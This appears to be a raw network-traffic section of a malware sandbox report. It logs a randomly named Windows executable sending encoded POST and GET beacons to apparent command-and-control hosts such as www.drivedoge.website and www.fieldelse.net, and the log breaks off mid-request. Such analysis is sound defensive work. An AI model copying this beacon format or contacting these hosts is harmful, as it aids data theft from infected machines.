                                                                                                                    Data Raw: 46 62 75 58 35 44 6e 50 3d 54 65 57 66 36 66 70 54 6b 45 66 66 6b 70 51 35 39 30 52 6d 6e 65 51 46 74 58 45 6e 63 36 77 79 6f 33 6c 69 62 5a 70 33 30 7a 31 68 55 72 72 62 44 63 41 6a 33 37 75 4b 77 74 2f 69 6b 45 37 34 2f 38 59 57 42 35 4e 4c 6c 66 4b 2b 68 73 46 45 72 58 72 56 6d 4a 66 59 4a 4e 35 35 41 4d 5a 49 66 6a 52 69 46 4d 31 61 78 44 57 78 73 33 7a 73 47 75 36 69 37 75 44 42 45 77 4b 6d 33 37 6e 66 58 2f 58 50 69 68 31 70 52 6a 70 59 66 77 57 49 55 69 54 61 54 6d 2f 49 36 64 41 6b 76 37 34 56 66 57 39 30 6e 65 2b 76 74 4e 45 63 4e 71 6a 72 72 52 58 53 31 4c 53 42 70 71 44 52 4c 39 6a 41 51 73 37 42 75 63 36 34 73 64 53 5a 52 34 30 71 67 43 76 35 72 52 6a 2f 75 72 67 57
                                                                                                                    Data Ascii: FbuX5DnP=TeWf6fpTkEffkpQ590RmneQFtXEnc6wyo3libZp30z1hUrrbDcAj37uKwt/ikE74/8YWB5NLlfK+hsFErXrVmJfYJN55AMZIfjRiFM1axDWxs3zsGu6i7uDBEwKm37nfX/XPih1pRjpYfwWIUiTaTm/I6dAkv74VfW90ne+vtNEcNqjrrRXS1LSBpqDRL9jAQs7Buc64sdSZR40qgCv5rRj/urgW
                                                                                                                    Sep 30, 2024 19:57:18.204229116 CEST778INHTTP/1.1 404 Not Found
                                                                                                                    Date: Mon, 30 Sep 2024 17:57:18 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 634
                                                                                                                    Connection: close
                                                                                                                    Server: Apache
                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 64 61 74 61 2d 70 61 67 65 3d 22 34 30 34 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 34 2e 20 d0 a4 d0 b0 d0 b9 d0 bb 20 d0 bd d0 b5 20 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 6e 6f 73 63 72 69 70 74 3e 3c 68 31 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 34 2e 20 d0 a4 d0 b0 d0 b9 d0 bb 20 d0 bd d0 b5 20 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd 3c 2f 68 31 3e 3c 70 3e d0 92 d0 be d0 b7 d0 bc d0 be d0 b6 d0 bd d0 be 2c 20 d0 b2 d1 8b 20 d0 be d1 88 d0 b8 d0 b1 d0 bb d0 b8 d1 81 d1 [TRUNCATED]
                                                                                                                    Data Ascii: <!DOCTYPE html><html data-page="404"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><title> 404. </title></head><body><noscript><h1> 404. </h1><p>, , , , .</p><p><a href="https://jino.ru"></a></p></noscript><div id="root"></div><script src="//parking-static.jino.ru/static/main.js?1.25.2" charset="utf-8"></script></body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    3192.168.2.549715195.161.68.8804508C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Sep 30, 2024 19:57:20.015578032 CEST1783OUTPOST /czka/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Length: 1245
                                                                                                                    Host: www.drivedoge.website
                                                                                                                    Origin: http://www.drivedoge.website
                                                                                                                    Referer: http://www.drivedoge.website/czka/
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                                                                    Data Raw: 46 62 75 58 35 44 6e 50 3d 54 65 57 66 36 66 70 54 6b 45 66 66 6b 70 51 35 39 30 52 6d 6e 65 51 46 74 58 45 6e 63 36 77 79 6f 33 6c 69 62 5a 70 33 30 7a 74 68 49 4a 54 62 45 50 59 6a 30 37 75 4b 34 4e 2f 68 6b 45 37 66 2f 38 67 53 42 35 42 68 6c 61 4f 2b 37 4c 46 45 36 46 54 56 78 35 66 59 48 64 34 2b 45 4d 59 53 66 6a 42 6d 46 4e 46 61 78 44 57 78 73 78 66 73 46 2f 36 69 33 4f 44 43 55 41 4b 79 68 37 6e 37 58 2b 2f 35 69 68 77 65 52 53 4a 59 66 54 2b 49 57 77 4c 61 61 6d 2f 47 35 64 41 38 76 37 31 4c 66 51 5a 53 6e 64 6a 4b 74 4b 6f 63 4a 63 4c 78 7a 31 54 2f 6e 39 48 6d 37 37 37 4f 57 70 36 6a 54 61 6e 54 70 39 53 33 72 38 47 54 66 64 6b 33 69 42 57 53 77 56 66 37 6d 71 68 6e 65 49 37 6f 4f 67 48 4f 66 67 32 65 6a 6e 6a 72 50 54 6b 51 31 66 38 77 54 30 6e 50 74 57 4e 56 6f 36 2f 4f 7a 46 7a 42 79 77 38 58 30 72 37 35 71 76 4f 51 71 54 78 31 76 6e 37 74 4f 58 74 42 46 69 51 76 72 53 52 5a 54 43 45 2f 6e 6d 71 45 6c 61 73 6a 47 63 2b 56 49 32 62 45 6e 54 34 65 72 49 37 67 55 50 58 69 41 59 6a 75 50 [TRUNCATED]
                                                                                                                    Data Ascii: FbuX5DnP=TeWf6fpTkEffkpQ590RmneQFtXEnc6wyo3libZp30zthIJTbEPYj07uK4N/hkE7f/8gSB5BhlaO+7LFE6FTVx5fYHd4+EMYSfjBmFNFaxDWxsxfsF/6i3ODCUAKyh7n7X+/5ihweRSJYfT+IWwLaam/G5dA8v71LfQZSndjKtKocJcLxz1T/n9Hm777OWp6jTanTp9S3r8GTfdk3iBWSwVf7mqhneI7oOgHOfg2ejnjrPTkQ1f8wT0nPtWNVo6/OzFzByw8X0r75qvOQqTx1vn7tOXtBFiQvrSRZTCE/nmqElasjGc+VI2bEnT4erI7gUPXiAYjuPFxq09zhqClHBmm4G4Wft8ARKA6jzvQlG37a5SScd16xuletBEoBxjBZJALyecZkfthL29x9Oz8gI5nSiArnj47qTpoKUptcWef406fSu1ssXjBhpzF7+awul/zjEMOISCJymh37oDqUbdpG6LZdB+Mg6Td+N1nutxeIKQyzDo2LVPxZnqgZeUVGgUJY1N3DSrbXHr5uJ8WgaEZkxRK0WIKJst5X6GkqkPo4A+BkdbStiYJb9+RueqhHrn1zd1TW5IGQSakfAKit7jUdOpOFlTJAkfyHUguA0tIz822uNgGXVAuc4ZkgFhKtoZmQA1s5stgPgu1hWOtWhdriyCTuUqYQnRtB4Wl+Pq8lB5gWpqIEYpbFdyhxWk6mncTNTaNiRLkX4pb3MQ2lOI+M0/ng2Vp2/0yxZZH4qCRhY5np9dikiloZROB2ARea/L9IXKGr3e0+PCH4RRbhQ84MwNbuVTrTNQkpBKc6XOZAKSloNepfT2BM7W3Z0bbMFtXl2PIBLlrWykRGblJaeKEVnXr3qNJ1ltZW3MrwtJRAp0M3vJ9AwfaLXcfA07S35AJkw0WiSkvjp9cZ33GiAK/8zKzJd7LP2uDOzjzt5ByfzLvB/dd95oFa7A6QDWDbmEwvO5vKUKEzesLNCzbflF/1n0hHemGIQz5eCx1SHOb [TRUNCATED]
                                                                                                                    Sep 30, 2024 19:57:20.890121937 CEST778INHTTP/1.1 404 Not Found
                                                                                                                    Date: Mon, 30 Sep 2024 17:57:20 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 634
                                                                                                                    Connection: close
                                                                                                                    Server: Apache
                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 64 61 74 61 2d 70 61 67 65 3d 22 34 30 34 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 34 2e 20 d0 a4 d0 b0 d0 b9 d0 bb 20 d0 bd d0 b5 20 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 6e 6f 73 63 72 69 70 74 3e 3c 68 31 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 34 2e 20 d0 a4 d0 b0 d0 b9 d0 bb 20 d0 bd d0 b5 20 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd 3c 2f 68 31 3e 3c 70 3e d0 92 d0 be d0 b7 d0 bc d0 be d0 b6 d0 bd d0 be 2c 20 d0 b2 d1 8b 20 d0 be d1 88 d0 b8 d0 b1 d0 bb d0 b8 d1 81 d1 [TRUNCATED]
                                                                                                                    Data Ascii: <!DOCTYPE html><html data-page="404"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><title> 404. </title></head><body><noscript><h1> 404. </h1><p>, , , , .</p><p><a href="https://jino.ru"></a></p></noscript><div id="root"></div><script src="//parking-static.jino.ru/static/main.js?1.25.2" charset="utf-8"></script></body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    4192.168.2.549716195.161.68.8804508C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Sep 30, 2024 19:57:22.559343100 CEST478OUTGET /czka/?FbuX5DnP=ec+/5ooiqEi687og6mxZgK97hGtyT8hL+UNAVpoR3RpVRqn8W9A98dmq3fmGshL635UHDIR5u/r4iIgXkla3rsnbIqFgNahEcjh4DtJ4lSLz0jzSBM29wabUMiG34aKFBg==&2Zv0=qtmpl4wh HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    Host: www.drivedoge.website
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                                                                    Sep 30, 2024 19:57:23.296463013 CEST778INHTTP/1.1 404 Not Found
                                                                                                                    Date: Mon, 30 Sep 2024 17:57:23 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 634
                                                                                                                    Connection: close
                                                                                                                    Server: Apache
                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 64 61 74 61 2d 70 61 67 65 3d 22 34 30 34 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 34 2e 20 d0 a4 d0 b0 d0 b9 d0 bb 20 d0 bd d0 b5 20 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 6e 6f 73 63 72 69 70 74 3e 3c 68 31 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 34 2e 20 d0 a4 d0 b0 d0 b9 d0 bb 20 d0 bd d0 b5 20 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd 3c 2f 68 31 3e 3c 70 3e d0 92 d0 be d0 b7 d0 bc d0 be d0 b6 d0 bd d0 be 2c 20 d0 b2 d1 8b 20 d0 be d1 88 d0 b8 d0 b1 d0 bb d0 b8 d1 81 d1 [TRUNCATED]
                                                                                                                    Data Ascii: <!DOCTYPE html><html data-page="404"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><title> 404. </title></head><body><noscript><h1> 404. </h1><p>, , , , .</p><p><a href="https://jino.ru"></a></p></noscript><div id="root"></div><script src="//parking-static.jino.ru/static/main.js?1.25.2" charset="utf-8"></script></body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    5192.168.2.54971718.141.10.107804508C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Sep 30, 2024 19:57:28.708139896 CEST734OUTPOST /exug/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Length: 209
                                                                                                                    Host: www.fieldelse.net
                                                                                                                    Origin: http://www.fieldelse.net
                                                                                                                    Referer: http://www.fieldelse.net/exug/
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                                                                    Data Raw: 46 62 75 58 35 44 6e 50 3d 65 57 42 73 6c 79 58 50 75 6a 59 79 62 6e 73 61 55 72 68 47 49 70 57 6f 6f 6d 71 30 41 56 6c 74 52 57 57 70 2f 47 47 78 35 4b 6c 43 58 4b 6d 52 4d 50 34 5a 63 31 6c 55 4a 47 45 55 42 4d 4d 4d 53 44 64 4b 72 53 64 51 63 6e 36 6f 45 30 35 59 43 65 6c 68 47 54 41 76 36 51 62 56 41 4b 4b 79 79 30 56 58 6c 4b 69 49 5a 62 48 77 46 36 6d 56 6f 59 6d 78 6b 41 48 34 6e 41 79 59 49 30 50 4b 55 32 4c 33 54 44 63 69 4d 6b 59 67 65 77 73 52 52 4c 69 68 4b 63 66 67 79 47 58 66 2f 33 6a 6a 55 63 38 48 59 72 4c 59 6c 71 45 72 72 47 6e 67 41 53 72 79 6b 50 68 78 34 43 71 4c 77 44 50 65 6c 47 46 67 66 43 30 3d
                                                                                                                    Data Ascii: FbuX5DnP=eWBslyXPujYybnsaUrhGIpWoomq0AVltRWWp/GGx5KlCXKmRMP4Zc1lUJGEUBMMMSDdKrSdQcn6oE05YCelhGTAv6QbVAKKyy0VXlKiIZbHwF6mVoYmxkAH4nAyYI0PKU2L3TDciMkYgewsRRLihKcfgyGXf/3jjUc8HYrLYlqErrGngASrykPhx4CqLwDPelGFgfC0=
                                                                                                                    Sep 30, 2024 19:57:30.045977116 CEST718INHTTP/1.1 200 OK
                                                                                                                    Server: nginx
                                                                                                                    Date: Mon, 30 Sep 2024 17:57:29 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Set-Cookie: btst=; path=/; domain=.www.fieldelse.net; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                                                                                                    Set-Cookie: btst=; path=/; domain=www.fieldelse.net; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                                                                                                    Set-Cookie: btst=6997142d45c01b68715ce26cf4a575ca|8.46.123.33|1727719049|1727719049|0|1|0; path=/; domain=.fieldelse.net; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                    Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                    Content-Encoding: gzip
                                                                                                                    Data Raw: 31 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: 140


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    6192.168.2.54971818.141.10.107804508C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Sep 30, 2024 19:57:31.517009020 CEST754OUTPOST /exug/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Length: 229
                                                                                                                    Host: www.fieldelse.net
                                                                                                                    Origin: http://www.fieldelse.net
                                                                                                                    Referer: http://www.fieldelse.net/exug/
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                                                                    Data Raw: 46 62 75 58 35 44 6e 50 3d 65 57 42 73 6c 79 58 50 75 6a 59 79 62 48 63 61 53 4d 31 47 4b 4a 57 70 6a 47 71 30 62 46 6c 32 52 57 61 70 2f 43 32 68 35 34 78 43 55 71 57 52 44 75 34 5a 66 31 6c 55 48 6d 45 62 5a 73 4d 62 53 44 41 71 72 54 78 51 63 6e 65 6f 45 31 4a 59 42 74 4e 67 41 44 42 4a 6a 67 62 74 4e 71 4b 79 79 30 56 58 6c 4b 32 6d 5a 62 66 77 47 4b 57 56 75 35 6d 79 70 67 48 37 67 41 79 59 4d 30 50 4f 55 32 4c 42 54 47 38 4d 4d 6d 51 67 65 30 6b 52 51 59 36 69 46 63 65 4b 2f 6d 57 55 78 31 6d 34 4e 74 73 53 64 74 66 62 31 70 30 30 71 77 4b 4b 61 77 6a 61 33 76 4e 4a 6f 52 69 38 68 7a 75 33 2f 6c 56 51 42 56 6a 68 43 71 71 4a 4b 5a 32 75 36 47 57 75 37 6b 32 43 4c 57 37 6c
                                                                                                                    Data Ascii: FbuX5DnP=eWBslyXPujYybHcaSM1GKJWpjGq0bFl2RWap/C2h54xCUqWRDu4Zf1lUHmEbZsMbSDAqrTxQcneoE1JYBtNgADBJjgbtNqKyy0VXlK2mZbfwGKWVu5mypgH7gAyYM0POU2LBTG8MMmQge0kRQY6iFceK/mWUx1m4NtsSdtfb1p00qwKKawja3vNJoRi8hzu3/lVQBVjhCqqJKZ2u6GWu7k2CLW7l
                                                                                                                    Sep 30, 2024 19:57:32.812064886 CEST718INHTTP/1.1 200 OK
                                                                                                                    Server: nginx
                                                                                                                    Date: Mon, 30 Sep 2024 17:57:32 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Set-Cookie: btst=; path=/; domain=.www.fieldelse.net; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                                                                                                    Set-Cookie: btst=; path=/; domain=www.fieldelse.net; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                                                                                                    Set-Cookie: btst=4b9f79239fdac8cebb79be9ac7a7f2a9|8.46.123.33|1727719052|1727719052|0|1|0; path=/; domain=.fieldelse.net; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                    Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                    Content-Encoding: gzip
                                                                                                                    Data Raw: 31 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: 140


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    7192.168.2.54971918.141.10.107804508C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Sep 30, 2024 19:57:34.158343077 CEST1771OUTPOST /exug/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Length: 1245
                                                                                                                    Host: www.fieldelse.net
                                                                                                                    Origin: http://www.fieldelse.net
                                                                                                                    Referer: http://www.fieldelse.net/exug/
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                                                                    Data Raw: 46 62 75 58 35 44 6e 50 3d 65 57 42 73 6c 79 58 50 75 6a 59 79 62 48 63 61 53 4d 31 47 4b 4a 57 70 6a 47 71 30 62 46 6c 32 52 57 61 70 2f 43 32 68 35 34 4a 43 55 59 65 52 4d 74 51 5a 65 31 6c 55 59 57 46 63 5a 73 4d 6a 53 44 49 6d 72 54 4e 6d 63 6c 32 6f 46 54 64 59 41 63 4e 67 4f 44 42 4a 2b 51 62 57 41 4b 4b 72 79 77 4a 54 6c 4b 6d 6d 5a 62 66 77 47 4d 61 56 70 6f 6d 79 72 67 48 34 6e 41 79 63 49 30 50 32 55 32 54 2f 54 47 77 79 4d 58 77 67 5a 56 59 52 64 4b 69 69 61 73 65 49 78 47 57 48 78 30 61 64 4e 74 77 65 64 74 43 77 31 70 4d 30 72 30 36 63 44 79 2f 33 32 2b 68 78 34 44 4b 38 39 48 6d 4b 39 45 56 41 4f 46 4c 53 65 36 79 45 4e 64 71 45 34 46 50 66 67 77 4b 4a 42 7a 61 66 6b 74 55 46 2f 58 72 73 62 33 49 75 50 70 64 7a 39 49 54 61 6d 59 77 48 71 48 66 44 44 6b 37 31 51 75 7a 43 6b 51 34 57 63 4f 58 55 42 4f 32 68 71 37 35 4a 5a 6b 33 33 4b 35 35 6b 5a 38 57 65 4e 4d 77 69 44 43 78 6a 58 5a 6d 36 45 30 54 41 35 58 47 54 53 2b 6d 7a 76 2f 50 79 33 62 54 48 41 63 6e 74 59 53 6a 2f 6d 46 6b 33 65 [TRUNCATED]
                                                                                                                    Data Ascii: FbuX5DnP=eWBslyXPujYybHcaSM1GKJWpjGq0bFl2RWap/C2h54JCUYeRMtQZe1lUYWFcZsMjSDImrTNmcl2oFTdYAcNgODBJ+QbWAKKrywJTlKmmZbfwGMaVpomyrgH4nAycI0P2U2T/TGwyMXwgZVYRdKiiaseIxGWHx0adNtwedtCw1pM0r06cDy/32+hx4DK89HmK9EVAOFLSe6yENdqE4FPfgwKJBzafktUF/Xrsb3IuPpdz9ITamYwHqHfDDk71QuzCkQ4WcOXUBO2hq75JZk33K55kZ8WeNMwiDCxjXZm6E0TA5XGTS+mzv/Py3bTHAcntYSj/mFk3eAu+t6D3isc0U267koFSFXdNWOcBPFkQMI1rjORkuUCHk8iyv54oubD59RDklKtvRCxOOMV5zMtrD65r5Ne1w9kFx9tcGTp+o39UuRGJXMOO8p3YNpwHxtOvAz6f7aWylWoxHih6vRMSi7lv+WtrDdEJWcR8DKLjTJlt9SPDUK+/vFyP/Dy4P9pJWZn5jRmPwEt7bOvrmCTuPpbewhT4v9yBZKvzORCF/XzyICg+rCqf1QWpxKjB/d7yD6d1fcyjDQpT6HVkWOTkAG3CNQbYzFzBccs+/g9HRZ+dXZORxwFhtiLjNxa8botiyQRWEjxBf1Jn20aBQRdxrPCciNPTF5exhyEaoM0opTR3SiMfB5/FeLxcMtUMwGj/foZNK8/Oh2THCaSh01aeAtb5U93ZWwCt9iuKxnUjQbrPT1MH0CEA9vPIUkX/umHbwSmLw7ViaIe0gJGN37xuEhIvu0MPlbwxghopr9NIgSujxQ+K35XfQpMYKfVlXaZVMNNgG/lhYp0i4vshaVyKEVei8AsV8eYu9TF+5PVUYChnaVLLgpdMSB502j0KbYNI4c229CJ6xXT/VLHzvkXD9J0uZ713jsNXkZsDbcqiFWP5NQVA87AFRU66Y0ceB/QqOn0OH3fhzeJccmXAYunbA+GU1L1sTDCD7mL7LJ6agNK [TRUNCATED]


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    8192.168.2.54972018.141.10.107804508C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Sep 30, 2024 19:57:36.699052095 CEST474OUTGET /exug/?2Zv0=qtmpl4wh&FbuX5DnP=TUpMmFq2kwIXLFstS9tSAK6sg3+MTXwTelyO0iz++Kl2PamQN8cgWwJpHGB2BYM6TBg0ujJhQFrOEWIIA95gJhU2w3nrLf6Fr1xVloq0NNPRZ4qmm6KGpgvxijzqAjWBDA== HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    Host: www.fieldelse.net
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                                                                    Sep 30, 2024 19:57:38.032759905 CEST668INHTTP/1.1 200 OK
                                                                                                                    Server: nginx
                                                                                                                    Date: Mon, 30 Sep 2024 17:57:37 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Set-Cookie: btst=; path=/; domain=.www.fieldelse.net; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                                                                                                    Set-Cookie: btst=; path=/; domain=www.fieldelse.net; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                                                                                                    Set-Cookie: btst=6ee77880b46944532b7aeb2ef77cb048|8.46.123.33|1727719057|1727719057|0|1|0; path=/; domain=.fieldelse.net; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                    Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: 0


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    9192.168.2.549721197.189.237.186804508C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Sep 30, 2024 19:57:43.462918043 CEST749OUTPOST /iv79/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    Content-Type: application/x-www-form-urlencoded
